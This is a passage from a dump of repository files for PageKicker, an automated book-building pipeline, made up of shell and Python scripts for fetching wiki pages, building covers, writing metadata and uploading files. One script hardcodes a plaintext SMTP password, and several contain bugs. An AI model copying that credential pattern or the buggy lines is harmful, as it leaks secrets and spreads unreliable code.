cert environment\n\nif client_certificate is None:\n foo = mwclient.Site(mediawiki_api_url)\n print(foo)\nelse:\n print('client certificate is ' + client_certificate )\n ssl_site1 = mediawiki_api_url + ', ' + 'client_certificate' + '='\n print('ssl site 1 is' + ssl_site1)\n ssl_site2 = ssl_site1 + client_certificate\n print(ssl_site2)\n\"\"\"\n#site = mwclient.Site(mediawiki_api_url, 'path='wikipath)\n\nfile = open(input_file, 'r').read().splitlines()\nfile2 = open(output_file, 'wb')\nfor line in file:\n try:\n print(line)\n page = site.pages[line]\n print(page)\n text = page.text()\n print(text)\n # print(text)\n except:\n mwclient.errors.InvalidPageTitle\n continue\n file2.write(b'\\n')\n print(text.encode('utf-8'))\n file2.write(b'\\n')\n file2.write(b'# ' )\n file2.write(line.encode('utf-8'))\n file2.write(b'\\n')\n file2.write(text.encode('utf-8'))\nfile2.close\n" }, { "alpha_fraction": 0.6410256624221802, "alphanum_fraction": 0.6538461446762085, "avg_line_length": 18.5, "blob_id": "a22a1f04338d24bb477a4789d3fafef61fc6353e", "content_id": "cb1a5161cd50095b1d8771530fdaaa331351c872", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 78, "license_type": "permissive", "max_line_length": 41, "num_lines": 4, "path": "/scripts/SKU.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nread COUNT echo $COUNT\necho $((COUNT+1)) > $LOCAL_DATA\"SKUs/sku\"\n" }, { "alpha_fraction": 0.5508555173873901, "alphanum_fraction": 0.553231954574585, "avg_line_length": 26.6842098236084, "blob_id": "2d42f40303233ec41de9636b1295987615091ee1", "content_id": "9db85a12f8b2ea86f33844f376004768a9986dc9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2104, "license_type": "permissive", "max_line_length": 78, "num_lines": 76, "path": "/scripts/bin/nervNG.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python\n###################################################\n# Fred Zimmerman\n# \n# Goal: Named entity recognition script to pull names/place from text\n# called as python nerv3.py text_path_or_file \n#\n# Inputs:\n# path - text file or directory containing text files\n# output - output file name \n# Outputs:\n# Output file written\n#\n###################################################\n\n\nfrom alchemyapi import AlchemyAPI\nimport json\nimport argparse\nimport os\n\n#=================================================\ndef listwrite(output_file,thelist):\n for item in thelist:\n item.encode('utf-8')\n output_file.write(\"%s\\n\" % item)\n\n#=================================================\n \ndef main():\n\n tmpdir = \"/tmp/pagekicker\"\n\n #personal api key saved as api_key.txt\n parser = argparse.ArgumentParser()\n parser.add_argument('--infile', help = \"target file or directory for NER\")\n parser.add_argument('--outfile', help = \"target file for output\")\n parser.add_argument('--uuid', help = \"uuid\")\n args = parser.parse_args()\n \n in_file = args.infile\n out_file = args.outfile\n uuid = args.uuid\n folder = os.path.join(tmpdir, uuid)\n print(folder)\n cwd = os.getcwd()\n apikey_location = os.path.join(cwd, \"api_key.txt\")\n print(in_file)\n with open(in_file) as f:\n filetext = f.read()\n return filetext\n\nfiletext = main()\n\nalchemyapi = AlchemyAPI()\n \nresponse = alchemyapi.entities('text', filetext, {'sentiment': 1})\n\nif response['status'] == 'OK':\n\n print(json.dumps(response, indent=4))\n\n for entity in response['entities']:\n print('text: ', entity['text'].encode('utf-8'))\n print('type: ', entity['type'])\n print('relevance: ', entity['relevance'])\n print('sentiment: ', entity['sentiment']['type'])\n if 'score' in entity['sentiment']:\n print('sentiment score: ' + entity['sentiment']['score'])\n print('')\nelse:\n print('Error in entity extraction call: ', response['statusInfo'])\n\n#=================================================\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.737500011920929, "alphanum_fraction": 0.7666666507720947, "avg_line_length": 39, "blob_id": "9cb5227fc8dad54e1480cbdbdb52a72c790ddf65", "content_id": "65ba9a4d36d4003b026c3feb02eb0045d3c3d90d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 240, "license_type": "permissive", "max_line_length": 72, "num_lines": 6, "path": "/scripts/includes/fable.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# booktype = fable\n# length = 300 to 1000 words\n# average sentence length =\n# protagonists = archetypal characters without name\n# structure = induction, action, moral\n# theme = abstract morality words such as responsibility, prudence, love\n" }, { "alpha_fraction": 0.6227545142173767, "alphanum_fraction": 0.635395884513855, "avg_line_length": 18.256410598754883, "blob_id": "56a97d5347dcc8961e32da2482f53f458e4c52c8", "content_id": "ccfae9ee0a5240a8b4f259a0a8133b61c9dafb16", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1503, "license_type": "permissive", "max_line_length": 97, "num_lines": 78, "path": "/scripts/corpus_processor.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n# processes robot or user's corpus directory\n\n\n# input: directory path that contains txt files with txt extension\n# note - this would break on splitter output - fix\n# output - unified wordcloud\n\nwordcloud=\"off\"\nstopimagefolder=\"none\"\noutdir=\"\"\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires user to provide path to directory containing one or more txt files\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--txtdir)\ntxtdir=$2\nshift 2\n;;\n--txtdir=*)\npdfinfile=${1#*=}\nshift\n;;\n--stopimagefolder)\nstopimagefolder=$2\nshift 2\n;;\n--stopimagefolder=*)\nstopimagefolder=${1#*=}\nshift\n;;\n--outdir)\noutdir=$2\nshift 2\n;;\n--outdir=*)\noutdir=${1#*=}\nshift\n;;\n--wordcloud)\nwordcloud=$2\nshift 2\n;;\n--wordcloud=*)\nwordcloud=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$txtdir\" ]; then\n echo \"ERROR: option '--txtdir[txtdir]' not given. See --help\" >&2\n exit 1\nfi\n\ncorpusname=`basename \"$txtdir\"`\necho corpusname is $corpusname\ncat \"$txtdir\"*.txt > \"$txtdir$corpusname\"\".txt\"\nbin/wordcloudwrapper.sh --txtinfile \"$txtdir$corpusname\"\".txt\" --outfile \"$txtdir$corpusname.png\"\necho \"concatenated corpus of\" $corpusname \"and did wordcloud from it\"\n\n" }, { "alpha_fraction": 0.5963302850723267, "alphanum_fraction": 0.5963302850723267, "avg_line_length": 14.142857551574707, "blob_id": "5ba398341dc38599ae06f4a1bc8618b63a8e832d", "content_id": "69917ddfc2a5efe6ed734b4ccf9d408c56017a26", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 109, "license_type": "permissive", "max_line_length": 37, "num_lines": 7, "path": "/scripts/cat_w_filename.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nfor i in $* \ndo\n\techo $i\n\techo \"from file\" $i >> oneliners.txt\n\tcat $i >> oneliners.txt\ndone\n\n\n\n" }, { "alpha_fraction": 0.6352674961090088, "alphanum_fraction": 0.6541070342063904, "avg_line_length": 28.488889694213867, "blob_id": "0d7c63022fbffb5499858adc2f668a32db2a5a2d", "content_id": "4392e4215c9dd898eb3a64e88c1201ed4cc24d3e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1327, "license_type": "permissive", "max_line_length": 98, "num_lines": 45, "path": "/scripts_python_3/bin/csvreader.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# reads rows of csv one at a time \n# code by @martineau \n# http://stackoverflow.com/questions/38489761/how-can-i-select-only-a-particular-row-in-a-csv-file\n\nimport csv\nfrom contextlib import contextmanager\nimport sys\nimport itertools\nimport os\n\n@contextmanager\ndef multi_file_manager(files, mode='w'):\n \"\"\" Context manager for multiple files. \"\"\"\n files = [open(file, mode) for file in files]\n yield files\n for file in files:\n file.close()\n\ndef csv_read_row(filename, n):\n \"\"\" Read and return nth row of a csv file, counting from 1. \"\"\"\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n return next(itertools.islice(reader, n-1, n))\n\nif len(sys.argv) != 4:\n print('usage: utility <csv filename> <uuid> <target row>')\n sys.exit(1)\n\ntmpdir = \"/tmp/pagekicker\"\nf = sys.argv[1]\nuuid = sys.argv[2]\ntarget_row = int(sys.argv[3])\nfolder = os.path.join(tmpdir, uuid)\n\n\ndestinations= [folder+dest for dest in ('/csv/row.editedby', \n'/csv/row.booktitle', \n'/csv/row.seeds', \n'/csv/row.imprint', '/csv/row.add_this_content')]\n\nwith multi_file_manager(destinations, mode='w') as files:\n row = csv_read_row(f, target_row)\n #editedby, booktitle, seeds, imprint = row[0], row[2], row[3], row[4]\n for i,j in zip(list(range(5)), (0, 2, 3, 4, 5)):\n files[i].write(row[j]+'\\n')\n" }, { "alpha_fraction": 0.7101449370384216, "alphanum_fraction": 0.7246376872062683, "avg_line_length": 33.5, "blob_id": "f530b42fa0a7e08e0d27c360dff2f26cbb3f10dc", "content_id": "b20f153580b8d3d52703b42f9d148829fe493b2e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 69, "license_type": "permissive", "max_line_length": 56, "num_lines": 2, "path": "/test/prsoop.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nbin/build_n_books_from_csv.sh /path/to/test/prsoop.csv 6\n" }, { "alpha_fraction": 0.663838803768158, "alphanum_fraction": 0.663838803768158, "avg_line_length": 61.86666488647461, "blob_id": "b5288eadb286d531acdaa5d07aaa80d0bb87bc3b", "content_id": "1844a7fb17a05d25e48d92a87701556bed86e06e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 943, "license_type": "permissive", "max_line_length": 269, "num_lines": 15, "path": "/scripts/includes/changelog.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \" \" >> \"$TMPDIR$uuid/changelog.md\"\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\necho \"# Changelog\" >> \"$TMPDIR$uuid/changelog.md\"\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\necho \"A key advantage of the PageKicker system is that the software is always improving. This is the way we keep track of the feature enhancements and bug fixes. For more info, see the open source repository at \"$COMMUNITY_GITHUB_REPO \".\" >> \"$TMPDIR\"$uuid/changelog.md\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\necho \"## Version\" >> \"$TMPDIR$uuid/changelog.md\"\necho \"Version number is \" $SFB_VERSION\".\" >> \"$TMPDIR$uuid/changelog.md\"\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\necho \"## Commits\" >> \"$TMPDIR$uuid/changelog.md\"\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\nbin/git_show_tags.sh | sed G | tac >> \"$TMPDIR$uuid/changelog.md\"\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\necho \" \" >> \"$TMPDIR$uuid/changelog.md\"\n" }, { "alpha_fraction": 0.7615230679512024, "alphanum_fraction": 0.7735471129417419, "avg_line_length": 48.900001525878906, "blob_id": "69d879fc365548a1feea4bdadea801545ef55d21", "content_id": "ce105833ccfc586e541cf642d2d18c7e937db236", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 499, "license_type": "permissive", "max_line_length": 130, "num_lines": 10, "path": "/scripts/bin/regressions.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n. ../conf/config.txt\n\necho \"running jobprofile Noir\"\n/home/wfz/sfb/sfb-latest/trunk/scripts/SFB-production.sh --jobprofile Noir.jobprofile 1> /dev/null\necho \"running jobprofile Hemingway\"\n/home/wfz/sfb/sfb-latest/trunk/scripts/SFB-production.sh --jobprofile Hemingway.jobprofile 1> /dev/null\necho \"running countries seedfile (10 docs) with rows set to 1\"\n/home/wfz/sfb/sfb-latest/trunk/scripts/SFB-production.sh --seedfile seeds/test/countries --fetched_document_format \"html\" --rows 1\n" }, { "alpha_fraction": 0.7233316898345947, "alphanum_fraction": 0.745007336139679, "avg_line_length": 37.37383270263672, "blob_id": "6ac5842ff81eb0cb3a7ff8a89d33cce93face438", "content_id": "6547335b9759d75a406299bffb99644cd64c66d4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 4106, "license_type": "permissive", "max_line_length": 233, "num_lines": 107, "path": "/scripts/includes/builder-cover.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# build cover\n\ncp $scriptpath\"assets/pk35pc.jpg\" \"$TMPDIR\"$uuid/pk35pc.jpg\ncp $confdir\"jobprofiles\"/imprints/\"$imprint\"/\"$imprintlogo\" \"$TMPDIR\"$uuid/cover/\"$imprintlogo\"\n\ncp $confdir\"jobprofiles\"/signatures/$sigfile \"$TMPDIR\"$uuid/$sigfile\n\n#select wordcloud stopfile\n\nif [ \"$wikilang\" = \"en\" ] ; then\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nelif [ \"$wikilang\" = \"sv\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/sv\"\nelif [ \"$wikilang\" = \"it\" ] ; then\n\tstopfile=\"$scriptpath\"\"locale/stopwords/it\"\nelse\n\tstopfile=\"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\n#rotate stopfile\n\nif cmp -s \"$scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\" $scriptpath\"/lib/IBMcloud/examples/restore-pk-stopwords.txt\" ; then\n\techo \"stopfiles are identical, no action\"\nelse\n\techo \"Rotating stopfile into place\"\n\tcp \"$stopfile\" \"$scriptpath\"\"lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\n# wordcloud is retired\n#\t\"$JAVA_BIN\" -jar $scriptpath\"lib/IBMcloud/ibm-word-cloud.jar\" -c $scriptpath\"lib/IBMcloud/examples/configuration.txt\" -w \"1800\" -h \"1800\" < \"$TMPDIR\"$uuid/wiki/wiki4cloud.md > \"$TMPDIR\"$uuid/cover/wordcloudcover.png 2> /dev/null\n\n# convert -size 1800x2400 \"$TMPDIR\"$uuid/cover/wordcloudcover.png\n\n#copying old stopfile backup to overwrite rotated stopfile\n\nif cmp -s \"$scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\" $scriptpath\"/lib/IBMcloud/examples/restore-pk-stopwords.txt\" ; then\n\techo \"stopfiles are identical, no action\"\nelse\n\techo \"Rotating old stopfile back in place\"\n\tcp $scriptpath\"/lib/IBMcloud/examples/restore-pk-stopwords.txt\" \"$scriptpath/lib/IBMcloud/examples/pk-stopwords.txt\"\nfi\n\n# set font & color\n\nif [ \"$coverfont\" = \"Random\" ] ; then\n\tcoverfont=`./bin/random-line.sh ../conf/fonts.txt`\n\techo \"random coverfont is \" $coverfont\n\nelse\n\tcoverfont=$coverfont\n\techo \"using specified cover font\" $coverfont\nfi\n\n\nif [ \"$covercolor\" = \"Random\" ]; then\n\tcovercolor=`./bin/random-line.sh ../conf/colors.txt`\n\techo \"random covercolor is \" $covercolor\nelse\n\tcovercolor=$covercolor\n\techo \"using specified covercolor \"$covercolor\n\nfi\n\necho \"covercolor is\" $covercolor\necho \"coverfont is\" $coverfont\n\n#create base canvases\n\nconvert -size 1800x2400 xc:$covercolor \"$TMPDIR\"$uuid/cover/canvas.png\nconvert -size 1800x800 xc:$covercolor \"$TMPDIR\"$uuid/cover/topcanvas.png\nconvert -size 1800x400 xc:$covercolor \"$TMPDIR\"$uuid/cover/bottomcanvas.png\nconvert -size 1800x800 xc:$covercolor \"$TMPDIR\"$uuid/cover/toplabel.png\nconvert -size 1800x200 xc:$covercolor \"$TMPDIR\"$uuid/cover/bottomlabel.png\n\n# underlay canvas\n\n\n# build top label\n\nconvert -background \"$covercolor\" -fill \"$coverfontcolor\" -gravity center -size 1800x2400 -font \"$coverfont\" caption:\"$booktitle\" \"$TMPDIR\"$uuid/cover/topcanvas.png +swap -gravity center -composite \"$TMPDIR\"$uuid/cover/toplabel.png\n\n#build bottom label\n\necho \"yourname is\" $yourname\nif [ \"$yourname\" = \"yes\" ] ; then\n\teditedby=\"$human_author\"\nelse\n\techo \"robot name on cover\"\nfi\n#editedby=\"PageKicker\"\necho \"editedby is\" $editedby\nconvert -background \"$covercolor\" -fill \"$coverfontcolor\" -gravity south -size 1800x394 \\\n -font \"$coverfont\" caption:\"$editedby\" \\\n \"$TMPDIR\"$uuid/cover/bottomcanvas.png +swap -gravity center -composite \"$TMPDIR\"$uuid/cover/bottomlabel.png\n\n# resize imprint logo\n\nconvert \"$TMPDIR\"$uuid/cover/\"$imprintlogo\" -resize x200 \"$TMPDIR\"$uuid/cover/\"$imprintlogo\"\n\n# lay the labels on top of the target canvas\n\ncomposite -gravity center \"$TMPDIR\"$uuid/cover/toplabel.png \"$TMPDIR\"$uuid/cover/canvas.png \"$TMPDIR\"$uuid/cover/step1.png\ncomposite -geometry +0+1800 \"$TMPDIR\"$uuid/cover/bottomlabel.png \"$TMPDIR\"$uuid/cover/step1.png \"$TMPDIR\"$uuid/cover/step2.png\ncomposite -gravity south -geometry +0+0 \"$TMPDIR\"$uuid/cover/\"$imprintlogo\" \"$TMPDIR\"$uuid/cover/step2.png \"$TMPDIR\"$uuid/cover/cover.png\nconvert \"$TMPDIR$uuid/cover/cover.png\" -border 36 -bordercolor white \"$TMPDIR$uuid/cover/bordercover.png\"\nconvert \"$TMPDIR$uuid/cover/bordercover.png\" \"$TMPDIR$uuid/cover/$sku\"\"ebookcover.jpg\"\nconvert \"$TMPDIR$uuid/cover/bordercover.png\" \"$TMPDIR$uuid/ebookcover.jpg\"\n" }, { "alpha_fraction": 0.8362069129943848, "alphanum_fraction": 0.8362069129943848, "avg_line_length": 153.6666717529297, "blob_id": "63cd17e00d2010f57cf67411488fe35c243f5f3a", "content_id": "8955d606a6fbe3f6519d446d7b2bccf93231dcca", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 464, "license_type": "permissive", "max_line_length": 442, "num_lines": 3, "path": "/conf/jobprofiles/imprints/wapacklabs/wapacklabs_mission.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# About Wapack Labs\n\n Wapack Labs is a privately held cyber intelligence and threat analysis firm serving companies and organizations around the globe by providing early warning threat detection through internet surveillance operations, data gathering, and in-depth analysis of economic, financial, and geopolitical issues. Intelligence information is shared with clients through an array of packages to meet both their cyber security needs and their bottom line.\n" }, { "alpha_fraction": 0.7245762944221497, "alphanum_fraction": 0.7881355881690979, "avg_line_length": 38.33333206176758, "blob_id": "99b78fbb98e32ec230c9a1cfeeaa9b8f60ce0b94", "content_id": "8e5b74585767c57740c1deec998f60826a149400", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 236, "license_type": "permissive", "max_line_length": 75, "num_lines": 6, "path": "/test/test-fetch-3dparty.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "cd ~/pagekicker-community/scripts/lib\ngit clone https://github.com/jarun/googler.git\nmkdir KindleGen\ncd KindleGen\nwget http://kindlegen.s3.amazonaws.com/kindlegen_linux_2.6_i386_v2_9.tar.gz\ntar -xvf kindlegen_linux_2.6_i386_v2_9.tar.gz\n" }, { "alpha_fraction": 0.6763485670089722, "alphanum_fraction": 0.6836099624633789, "avg_line_length": 25.77777862548828, "blob_id": "5953aab7a8125b6db3224b2d1a22fc670b5b20b0", "content_id": "cf64914fa137a62750c3bac578394069cdce74fb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 964, "license_type": "permissive", "max_line_length": 95, "num_lines": 36, "path": "/scripts/screen-naughty-and-duplicate-seeds.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n. ../conf/config.txt\n\n# echo \"beginning to screen out naughty and duplicate seeds\" >> $sfb_log\n\nwhile read -r line; do \n\nif grep -q \"$line\" \"seeds/disallowed-seeds.txt\" ; then \n\techo \"ncp_err_code:disallowed the seed \"$line \"was disallowed\" | tee --append $sfb_log\n # figure out how to send an error report to the user here\n\tpk_err_code=\"disallowed\"\n\techo \"pk_err_code is\" $pk_err_code\nsendemail -t \"$customer_email\" \\\n\t-m \"This book build has been cancelled because the seeds included the disallowed word $line\" \\\n\t-f [email protected] \\\n\t-cc [email protected] \\\n\t-xu [email protected] \\\n\t-xp \"f1r3comb\" \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \n\n#elif grep -q \"$line\" $LOCAL_DATA\"seeds/history/seed-history.csv\"\n#then \n\techo \"ncp_err_code:duplicate the seed \"$line \" is a duplicate\" | tee --append $sfb_log\n\n # # figure out how to send an error report to the user here\n\nelse\n#\techo $line | tee --append $LOCAL_DATA\"allowed/allowed-history.txt\"\n\techo \"pass\"\nfi\n\ndone <$ 1\n\nexit 0\n" }, { "alpha_fraction": 0.6596638560295105, "alphanum_fraction": 0.674369752407074, "avg_line_length": 17.30769157409668, "blob_id": "c7cbad4a2937dd16fc8db31adb3f1ae89419cf7d", "content_id": "d8fe6a1a465e0badf6c23d68fa9208c1ef644899", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 476, "license_type": "permissive", "max_line_length": 71, "num_lines": 26, "path": "/scripts/timestamper.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# Generate a current unix timestamp\n#\ncreatetime=$(( `date +%s` ))\n\necho \"createtime is \" $createtime\n\nspecial_from=$createtime\n\n# Adjust the timestamp above by +4 hours\n\nhours=4\n\nspecial_lasts_sec=$(( $hours * 60 * 60 ))\n\necho \"special lasts for this number of seconds\" $special_lasts_sec\n\n(( special_to = createtime + special_lasts_sec ))\n\necho \"special expires at \" $special_to\n\necho \"special expires at\" `date -d @$special_to +'%m/%d/%y%n %H:%M:%S'`\n\nexit\n0\n" }, { "alpha_fraction": 0.7174071669578552, "alphanum_fraction": 0.7217771410942078, "avg_line_length": 23.675676345825195, "blob_id": "b6dd95b892fb097ef7aebddd2c3bb649308421e7", "content_id": "6eb9c4b0ff44c1c450c65be697cee168418d2284", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2746, "license_type": "permissive", "max_line_length": 130, "num_lines": 111, "path": "/scripts/includes/bookshelf-footer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": " # builds metadata footer for public bookshelf categories\n\ncreatetime=$(( `date +%s` ))\n\necho \"createtime is \" $createtime >> $sfb_log\n\nspecial_price=0.00\n\n#list of all metadata fields begins here\n\n# rootid\nrootid=2 # for PageKicker main\n\necho -n \"$rootid,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# store\n\nstorecode=\"default\" # for PageKicker main\necho -n \"$storecode,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# category_id\n\necho -n \"$catid,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# name\n\necho -n \"Public Bookshelf for $customer_name,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# description\n\necho -n \"Public Bookshelf for $customer_name,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n#categories\n\necho -n \"Customer Bookshelf/$customer_name,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# url_key\n\nsafe_url_key=$(echo \"$customer_name\" | sed -e 's/[^A-Za-z0-9._-]/-/g')\n\necho -n $\"$safe_url_key,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# is_active\n\necho -n \"1,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# meta_title\n\necho -n \"Public Bookshelf for $customer_name,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# url_path\n\necho -n $\"$safe_url_key.html,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n\n# is_anchor\n\necho -n \"1,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# meta_keywords\n\necho -n \"TBD,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# meta_description\n\necho -n \"Publicly shared ebooks from PageKicker customer $customer_name,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# display_mode\n\necho -n \"PRODUCTS_AND_PAGE,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# page_layout\n\necho -n \",\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# cms_block\n\necho -n \",\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# custom_layout_update\n\necho -n \",\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# custom_design\n\necho -n \",\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# category_image\n\necho -n \",\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# category_thumb_image\n\necho -n \",\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# include_in_menu\n\necho -n \"0,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# custom_apply_to_products\n\necho -n \"0,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n# custom_use_parent_settings\n\necho -n \"0,\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n# position\n\n# last column has no -n flag and no terminal comma\n\necho \"1\" >> $metadatatargetpath$uuid/\"import_bulk_categories.csv\"\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.7520798444747925, "alphanum_fraction": 0.7554076313972473, "avg_line_length": 39.06666564941406, "blob_id": "ef8157f5ff97f450aed5aacc8a4701d832e3d26a", "content_id": "ff1ae1be0cefe732ee51294f3be372fd8f59f6a8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 601, "license_type": "permissive", "max_line_length": 153, "num_lines": 15, "path": "/scripts/includes/LSI-upload.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\nINGRAMSFTPSERVER=\"cs2ftp.ingramcontent.com\"\n# insert header in accumulated metadata import rows\n\n# SERVER=\necho \"building LSI import metadata\" | tee --append $sfb_log\n\ncat includes/lsi-metadata-header.txt > $SFB_MAGENTO_HOME\"wfrederickzimmerman_\"$YYYYMMDD\".csv\"\ncat $metadatatargetpath\"/lsi-import-ready.csv\" >> $SFB_MAGENTO_HOME\"wfrederickzimmerman_\"$YYYYMMDD\".csv\"\n\n# convert csv to xls with (grr...) sheet named \"metadata\"\n\n(echo put $$SFB_MAGENTO_HOME\"wfrederickzimmerman_\"$YYYYMMDD\".xls\" echo put $SFB_MAGENTO_HOME\"lsi-import\"/*.EPUB; echo quit) | sftp -b - $INGRAMSFTPSERVER\n\nexit 0\n" }, { "alpha_fraction": 0.5378549098968506, "alphanum_fraction": 0.551261842250824, "avg_line_length": 18.8125, "blob_id": "fa1ea3c0b2def117f49485d456a268cc04bc0e67", "content_id": "e452d5a5d0e0b1a9b3687d4585965186de1bf538", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1268, "license_type": "permissive", "max_line_length": 122, "num_lines": 64, "path": "/scripts/acronym-filter.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# filters text file looking for acronyms\n\n# input: text file as --txtinfile\n# output: sorted uniq stdout\n# flags: --verbose \"y\" (stupidly requires y)\n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires input text file name\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--txtinfile)\ntxtinfile=$2\nshift 2\n;;\n--txtinfile=*)\ntxtinfile=${1#*=}\nshift\n;;\n--verbose|v)\nverbose=$2\nshift 2\n;;\n--verbose|v=*)\nverbose=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$txtinfile\" ]; then\n echo \"ERROR: option '--txtinfile[txtinfile]' not given. See --help\" >&2\n exit 1\nfi\n\nif [ \"$verbose\" = \"y\" ] ; then\n\techo \"text infile is \"$txtinfile\nelse\n\ttrue\nfi\n\n\n#sed 's/[[:space:]]\\+/\\n/g' $txtinfile | sort -u | egrep '[[:upper:]].*[[:upper:]]' | sed 's/[\\(\\),]//g' | uniq\nsed 's/[[:space:]]\\+/\\n/g' \"$txtinfile\" | sort -u | egrep -e '[A-Z][a-zA-Z0-9+\\.\\&]*[A-Z0-9]' | sed 's/[\\(\\),]//g' | uniq\n# more selective regex\n" }, { "alpha_fraction": 0.7214621305465698, "alphanum_fraction": 0.727384090423584, "avg_line_length": 31.00653648376465, 